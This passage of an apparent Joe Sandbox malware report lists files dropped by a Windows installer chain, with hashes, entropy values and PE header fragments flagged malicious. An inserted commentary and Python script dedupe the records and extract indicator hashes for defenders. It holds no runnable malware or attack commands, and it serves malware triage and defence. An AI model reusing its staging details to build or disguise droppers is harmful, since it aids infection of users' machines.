                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):500000
                                                                                                                                                                                                                                Entropy (8bit):6.021986548032622
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:8HPIkbNcJ6+M+pP4LRgnU1ICrxUqLsxy06Gm856Xorx9ioQbOF/rPsgTtprZP4FR:cPNcsiFU1bxUyXGHlWbOF/rPsgTX2Xz
                                                                                                                                                                                                                                MD5:932F74E39CA5186F60BC9349C38DDA42
                                                                                                                                                                                                                                SHA1:40540CF3ACC0541FE471259BE690AB3CE36EA13E
                                                                                                                                                                                                                                SHA-256:33F115D30E946FBF55BCAE827EC929F0E3DB56CEC856AC04ED4027DF38F70300
                                                                                                                                                                                                                                SHA-512:D2EB3C07C5F81F30B3CB158675BDA8D5587ADA41BE520C7A32713DC467E2FC421E66EB9316DDB4A43834EC3AD71D5E56F505E4180BB4055883224D5A1BE32395
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa.NdkIBX7R0MXI/fz98B1G7Pj5EkToaaPHCnfPQ01B3yzo5ZQLm0Y6S/bZwQJ+1O3ua2jO3QslgyVX.0sCO32ZP26v5QpkgPMfQ6LYGfvPw/Z3yBcqZFGQYw5cUpLlOshrhokH3lYs/qr6OjQ02dt2FiG4c.j7nkEUF7P0yh1yFbK6aBHgYiliOsBF11EMx+QWETtPXLfm3WuhyrvcvmBVVi45ayu5vhYo3oTsVs.OnkiYR/v2VjJwSdl7Kwrba3P5cdHh7BefANDi2bGIoafnRn98g4YQtRVgpEQbRULAKJNlIkZjdJa.Q5jw67IDhIDvGxIDdsmr3NOfK/1xuB0at4WFtSvfmJbDum3LacnP4SOeajoPR3rYY1pS6Fg63beJ.RT68kEmTT01eX9bR7KlAuZEj+RDHjsH7c6E10J+z/c2WT1JVqt1kQ1vnUuLi4g9s7asdr8YvGbO5.rnXEUPJmT1wPdrwZUqzoVeZcfjwzkxU96Z3n16J4+lDfw9EXNzQL+M9bLjDDbV1DlWDH8Z9BCxwC.I2JS6ZgnO6lW9qQoOJGp846lYKOogT7bQ7/7BXP+SVKAiBEKhDbX4tfJQT7LvybURsdyt8CH60yU.n6Twu9oiay1ghXYuOEDteKMxfnC3CblbhJtfmTzWoMzg2bQvBKh0DncbCHid49SQkuH+dkCB4CC0.Z3g+r0uRLhtnIfRPToXE8fAQCgSIZYX93cP6ycyQfDC3hP2aqiikKrTeG4asHtXPbnk4bk+GLpuH.6zmu6TKxdRN7RrDgptIGObZxEVKJp35t4sSK7s0TKo3EPakM6AmqpbOwbeSlVU7LAkgj2CDX1gJi.l2hmltKpfpQLAz06AhhRGFk28JMl8O91NhI/y/UwYiMU6jqSTP8FmWGOEgSVUAdUa2HFX441kJ4Z
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):706560
                                                                                                                                                                                                                                Entropy (8bit):6.506350582279243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
                                                                                                                                                                                                                                MD5:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
                                                                                                                                                                                                                                SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
                                                                                                                                                                                                                                SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2560
                                                                                                                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                                                Entropy (8bit):4.289297026665552
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                                                                                                                                                                MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                                                                                                                                                                SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                                                                                                                                                                SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                                                                                                                                                                SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):23312
                                                                                                                                                                                                                                Entropy (8bit):4.596242908851566
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):706560
                                                                                                                                                                                                                                Entropy (8bit):6.506350582279243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
                                                                                                                                                                                                                                MD5:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
                                                                                                                                                                                                                                SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
                                                                                                                                                                                                                                SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
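Two observations a reader triaging this listing should not miss. First, the 706560-byte PE32 entry directly above is the same file as the one dropped earlier by `FnzHBAPEbvEEx8ZWWEvo0R6a.exe` (identical MD5/SHA-1/SHA-256), written a second time by `uOoBNdE6Sm5DmPd13osCbhQm.exe`; the same holds for the 2560-byte DLL that two `is-XXXXX.tmp\*.tmp` processes unpack. Its `MZP` stub, the "This program must be run under Win32" message and the CODE/DATA/BSS section names are the Borland/Delphi linker's, and `is-XXXXX.tmp` directories are Inno Setup's temporary extraction folders. Second, the 60-byte "PowerShell test file to determine AppLocker lockdown mode" entries are written by powershell.exe itself at every start to probe the script execution policy; they appear in any report where PowerShell ran and say nothing about the sample. The following Python is an added example, not part of the Joe Sandbox report: it parses the flat `Key:value` record layout used on this page (three of the records above are embedded as a constructed sample, long `Preview` fields omitted), collapses one binary dropped by several parents into a single entry per SHA-256, extracts the hashes of entries the sandbox marked `Malicious:true`, tags the PowerShell probe as noise, and recomputes the `Entropy (8bit)` column. The 7.2 bits-per-byte "likely packed" cut-off is a rule-of-thumb assumption, not a Joe Sandbox setting; none of the files listed here reach it, which is consistent with every entry reading `Encrypted:false`.

```python
"""Triage helpers for the dropped-file records of a Joe Sandbox report.

Added example, not part of the report: parses the "Key:value" record layout,
dedupes by SHA-256, pulls Malicious:true hashes, and recomputes "Entropy (8bit)".
"""
import math
from collections import Counter

# Constructed sample: three records from this page, leading whitespace removed,
# long PE "Preview" fields and some columns left out.
SAMPLE_REPORT = r"""
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Size (bytes):60
Entropy (8bit):4.038920595031593
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe
Size (bytes):706560
Entropy (8bit):6.506350582279243
MD5:1C1FD0B05187F81F28F910EB5B511E12
SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
Malicious:true
Process:C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe
Size (bytes):706560
Entropy (8bit):6.506350582279243
MD5:1C1FD0B05187F81F28F910EB5B511E12
SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
Malicious:true
"""

# powershell.exe writes this text to a temp .ps1 on every start to probe the
# AppLocker/WDAC script policy; under powershell.exe it is expected noise.
POLICY_PROBE_PREFIX = "# PowerShell test file to determine AppLocker lockdown mode"


def parse_records(text):
    """One dict per record; a record starts at a "Process:" line."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)  # first colon only: drive letters keep theirs
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def shannon_entropy(data):
    """Shannon entropy in bits per byte, 0.0 .. 8.0, as in "Entropy (8bit)"."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_powershell_policy_probe(record):
    """True for the 60-byte AppLocker probe file written by powershell.exe."""
    return (record.get("Process", "").lower().endswith("powershell.exe")
            and record.get("Preview", "").startswith(POLICY_PROBE_PREFIX))


def dedupe_by_hash(records):
    """Group by SHA-256: one entry per distinct file plus every process that wrote it."""
    groups = {}
    for rec in records:
        sha = rec.get("SHA-256")
        if not sha:
            continue
        entry = groups.setdefault(sha, {
            "md5": rec.get("MD5"),
            "size": int(rec.get("Size (bytes)", "0")),
            "entropy": float(rec.get("Entropy (8bit)", "0")),
            "malicious": rec.get("Malicious") == "true",
            "probe": is_powershell_policy_probe(rec),
            "droppers": [],
        })
        entry["droppers"].append(rec.get("Process"))
    return groups


def extract_iocs(records):
    """Sorted, de-duplicated (SHA-256, MD5) pairs for entries marked Malicious:true."""
    return sorted((sha, g["md5"]) for sha, g in dedupe_by_hash(records).items()
                  if g["malicious"])


def triage(text, packed_threshold=7.2):
    """One summary row per unique artifact. packed_threshold is a rule-of-thumb
    assumption (not a Joe Sandbox setting) above which whole-file entropy
    usually indicates compressed or encrypted content."""
    rows = []
    for sha, g in dedupe_by_hash(parse_records(text)).items():
        rows.append({
            "sha256": sha,
            "size": g["size"],
            "malicious": g["malicious"],
            "dropper_count": len(g["droppers"]),
            "likely_packed": g["entropy"] > packed_threshold,
            "note": "powershell policy probe, benign noise" if g["probe"] else "",
        })
    return rows


if __name__ == "__main__":
    print(triage(SAMPLE_REPORT), extract_iocs(parse_records(SAMPLE_REPORT)))
```

Run against the full report text (copied with its indentation intact; `parse_records` strips it) the dedupe step shrinks the file list to the distinct binaries actually worth hashing into a blocklist, and the `dropper_count` column shows which artifacts several stages of the chain write, a useful hint about shared installers versus per-payload drops.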
Process:C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2560
Entropy (8bit):2.8818118453929262
Encrypted:false
SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:A69559718AB506675E907FE49DEB71E9
SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.289297026665552
Encrypted:false
SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):23312
Entropy (8bit):4.596242908851566
Encrypted:false
SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:false
Reputation:unknown
Process:C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):706560
Entropy (8bit):6.506350582279243
Encrypted:false
SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
MD5:1C1FD0B05187F81F28F910EB5B511E12
SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
Malicious:true
Reputation:unknown
Process:C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):706560
Entropy (8bit):6.506350582279243
Encrypted:false
SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
MD5:1C1FD0B05187F81F28F910EB5B511E12
SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2560
Entropy (8bit):2.8818118453929262
Encrypted:false
SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:A69559718AB506675E907FE49DEB71E9
SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.289297026665552
Encrypted:false
SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):23312
Entropy (8bit):4.596242908851566
Encrypted:false
